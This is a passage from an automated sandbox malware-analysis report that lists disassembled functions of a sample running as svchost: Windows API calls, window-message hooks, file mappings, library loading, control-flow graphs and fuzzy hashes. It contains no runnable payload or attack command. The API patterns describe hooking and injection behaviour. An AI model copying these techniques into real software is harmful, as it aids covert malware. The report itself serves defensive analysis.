                                                                                                                                                                    • Instruction Fuzzy Hash: 45113C78E08748AFCB40DFA5C484AADFBF5BF49220F1596D5D854AB342E3B09A40CF90
                                                                                                                                                                    Function 03E3A45C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowInfo.USER32(03E3A53E,?), ref: 03E3A46D
                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 03E3A480
                                                                                                                                                                    • GetSystemMetrics.USER32(00000033), ref: 03E3A49B
                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 03E3A4A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem$InfoWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2832802444-0
                                                                                                                                                                    • Opcode ID: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction ID: 47bc49de90ed04594d7011a49ecd0d5b3dc78756596661c0c458e1276d7dfbc2
                                                                                                                                                                    • Opcode Fuzzy Hash: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction Fuzzy Hash: C5F05475D0130DAFDB40EFE5C94D6DDB7B8AF16250F1053A5A544EF280E6319A84CB51
                                                                                                                                                                    Function 03E39E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                    • PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc$CurrentMessagePostProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 1656095895-3140657398
                                                                                                                                                                    • Opcode ID: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction ID: d037a2f3ad6bdc812db245db23fed1fc707427996a8da4dd29a116643399cfdf
                                                                                                                                                                    • Opcode Fuzzy Hash: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction Fuzzy Hash: 93E0C9796053089FCB40EBDAD84CE96B3F9E74A615B142640F544DB252C775A840CB50

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 03E345D8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03E346F3
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03E34700
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03E34706
                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 03E34731
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E34786
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E34796
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E347C2
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347D2
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347FC
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E3480C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                    • Opcode ID: 0d4a8a7088d4b22792defebff3a3db9843fcba8d9a6a4c73311eb70cbc31bcbf
                                                                                                                                                                    • Instruction ID: 027d7748506c5a87c4e243fd0419d3990cb98108b6fbf369a26e7d6e62afc838
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d4a8a7088d4b22792defebff3a3db9843fcba8d9a6a4c73311eb70cbc31bcbf
                                                                                                                                                                    • Instruction Fuzzy Hash: FB617175E4034D7EEB20EAE5CC49FEFB7BCDB0A704F4452A5A604E6181DAB49A44CF60
                                                                                                                                                                    Function 03E3B054 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B11A
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(?,00000040), ref: 03E38CB0
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(03E3B1E5,00000004), ref: 03E38CDE
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B159
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B16E
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20B,00000000,00000000), ref: 03E3B187
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,03E3B1E5), ref: 03E3B1A7
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20C,00000000,00000000), ref: 03E3B1C0
                                                                                                                                                                      • Part of subcall function 03E38214: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,03E3B08F,00000000,03E3B1E5), ref: 03E3822B
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                      • Part of subcall function 03E39B94: GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentFileProcess$MappingMessageModuleOpenPostRead$ErrorHandleLastName
                                                                                                                                                                    • String ID: iexplore.exe
                                                                                                                                                                    • API String ID: 3641758393-3286091477
                                                                                                                                                                    • Opcode ID: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction ID: 90adf319c057bca9e01d0155c6122fdb93f864de824287b644fd7449e8fe0965
                                                                                                                                                                    • Opcode Fuzzy Hash: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 88413B346043199FD701EBA9C88DFA9B7F5AF4A304F506690E402EF395D775E944CB21
                                                                                                                                                                    Function 03E39B94 Relevance: 9.1, APIs: 6, Instructions: 52fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BF9
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000074,00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C1A
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLastMappingOpenView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3772272286-0
                                                                                                                                                                    • Opcode ID: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction ID: 9d5a6f2857757f7b8aeb8be148303497c667ebca04b670841a5710fa7b36e006
                                                                                                                                                                    • Opcode Fuzzy Hash: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction Fuzzy Hash: 55110374985368EAE710FB76AD4DB96B7E8E706714F182794E2825F2D5C7B43080CB14
                                                                                                                                                                    Function 03E319E4 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlInitializeCriticalSection.KERNEL32(03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E319FB
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(03E3D5C4,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A0E
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A38
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E31AB3,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31AA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 730355536-0
                                                                                                                                                                    • Opcode ID: 2a3538e0cdc6eb963358a54c81ca74006d2c8fb7d45df609565b63a1a36945c3
                                                                                                                                                                    • Instruction ID: b54c4fee93dce392a8a5e38fa1fec6ba3a19def9542bdaf68c07070a1b5fe2a0
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3538e0cdc6eb963358a54c81ca74006d2c8fb7d45df609565b63a1a36945c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 611190B8A48218EFDB15FF66C80DB5ABBE0EB47705F00A36CE0148B280C6B45901DB54
                                                                                                                                                                    Function 03E39DC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 624 3e39dc8-3e39ded call 3e39c74 627 3e39e18-3e39e1e 624->627 628 3e39def-3e39e0c PostMessageA 624->628 628->627 629 3e39e0e-3e39e13 call 3e39e3c 628->629 629->627
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 03E39DFF
                                                                                                                                                                      • Part of subcall function 03E39E3C: GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                      • Part of subcall function 03E39E3C: PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadMessagePostProc$CurrentProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 3249817243-3140657398
                                                                                                                                                                    • Opcode ID: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction ID: 4f4b2d3ffbcbb2dfbf5db0aabf88008aa430137904cf40fc1a074618801ca8a5
                                                                                                                                                                    • Opcode Fuzzy Hash: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction Fuzzy Hash: DEF017B5E0121CAFCB00DFE9C848B9EB7F8AB0A200F1097A5B818E7341D3709A10CB91
                                                                                                                                                                    Function 03E32240 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 631 3e32240-3e32250 632 3e32252 call 3e319e4 631->632 633 3e3225b-3e32261 631->633 640 3e32257-3e32259 632->640 634 3e32263-3e32268 633->634 635 3e3226d-3e32282 633->635 637 3e323e3-3e323ea 634->637 638 3e32284-3e32289 RtlEnterCriticalSection 635->638 639 3e3228e-3e32297 635->639 638->639 641 3e32299 639->641 642 3e3229e-3e322a4 639->642 640->633 640->634 641->642 643 3e32356-3e3235c 642->643 644 3e322aa-3e322ae 642->644 645 3e323b1-3e323b3 call 3e320f8 643->645 646 3e3235e-3e3236b 643->646 647 3e322b3-3e322c7 644->647 648 3e322b0 644->648 654 3e323b8-3e323cf 645->654 649 3e3237a-3e323af call 3e33724 646->649 650 3e3236d-3e32375 646->650 647->643 652 3e322cd-3e322ea 647->652 648->647 649->637 650->649 655 3e322fa-3e3231e 652->655 656 3e322ec-3e322f8 652->656 660 3e323d1-3e323d6 RtlLeaveCriticalSection 654->660 661 3e323db 654->661 659 3e32320-3e32351 call 3e33724 655->659 656->659 659->637 660->661
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlInitializeCriticalSection.KERNEL32(03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E319FB
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlEnterCriticalSection.KERNEL32(03E3D5C4,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A0E
                                                                                                                                                                      • Part of subcall function 03E319E4: LocalAlloc.KERNEL32(00000000,00000FF8,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A38
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E31AB3,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31AA6
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(03E3D5C4,00000000,03E323DC), ref: 03E32289
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E323E3), ref: 03E323D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2227675388-0
                                                                                                                                                                    • Opcode ID: bd177c8c56c373aa99f941c02cd90d0a710ade592790609498dbd18502344499
                                                                                                                                                                    • Instruction ID: b03b6181135d3c88ea159908219dc6d75cc71924e0400ad241425dd562a5b5c9
                                                                                                                                                                    • Opcode Fuzzy Hash: bd177c8c56c373aa99f941c02cd90d0a710ade592790609498dbd18502344499
                                                                                                                                                                    • Instruction Fuzzy Hash: E3518BB5A04209DFCB10EFA9D988AAEF7F1FB8A304F149769D454A7344D330A941CF52
                                                                                                                                                                    Function 03E39F0C Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 664 3e39f0c-3e39f1d 665 3e39f40-3e39f53 CallNextHookEx 664->665 666 3e39f1f-3e39f3e CallNextHookEx 664->666 667 3e39f56-3e39f6c 665->667 666->667 668 3e39f72-3e39f7d 667->668 669 3e3a026-3e3a05c 667->669 668->669 670 3e39f83-3e39f8a call 3e399e0 668->670 670->669 674 3e39f90-3e39f94 670->674 675 3e39f96-3e39f99 674->675 676 3e39fd4-3e39ffb call 3e39d40 674->676 678 3e3a006-3e3a021 call 3e39dc8 675->678 679 3e39f9b-3e39f9c 675->679 676->669 684 3e39ffd-3e3a004 676->684 678->669 679->669 682 3e39fa2-3e39fc9 call 3e39d40 679->682 682->669 686 3e39fcb-3e39fd2 682->686 684->669 686->669
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E39F36
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E39F4E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3378577984-0
                                                                                                                                                                    • Opcode ID: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction ID: b5e366564f323c351643d1b7519a08d3ebf7ce8602ce7b5476ded2fff8d4f7f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41F039204208EFDB10DF59E989EA973F9EB0A310F2492A1F905DB3A1D772E940CF10
                                                                                                                                                                    Function 03E31444 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 687 3e31444-3e31451 688 3e31453-3e31458 687->688 689 3e3145a-3e31460 687->689 690 3e31466-3e3147e VirtualAlloc 688->690 689->690 691 3e314a3-3e314a6 690->691 692 3e31480-3e3148e call 3e31268 690->692 692->691 695 3e31490-3e314a1 VirtualFree 692->695 695->691
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E31473
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E3149A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                    • Opcode ID: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction ID: 6b027bd1f4a72286e53f060f334b72aa16e4232007e5c2ffe7824b42510e413c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction Fuzzy Hash: 65F0AE76F007305ADB20F5694C88B9255989F877A1F155379FD4CEF3C8D6914801C291
                                                                                                                                                                    Function 03E34344 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 696 3e34344-3e34352 697 3e34354-3e3436b GetModuleFileNameA call 3e345d8 696->697 698 3e3437f-3e3438a 696->698 700 3e34370-3e34377 697->700 700->698 701 3e34379-3e3437c 700->701 701->698
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E34362
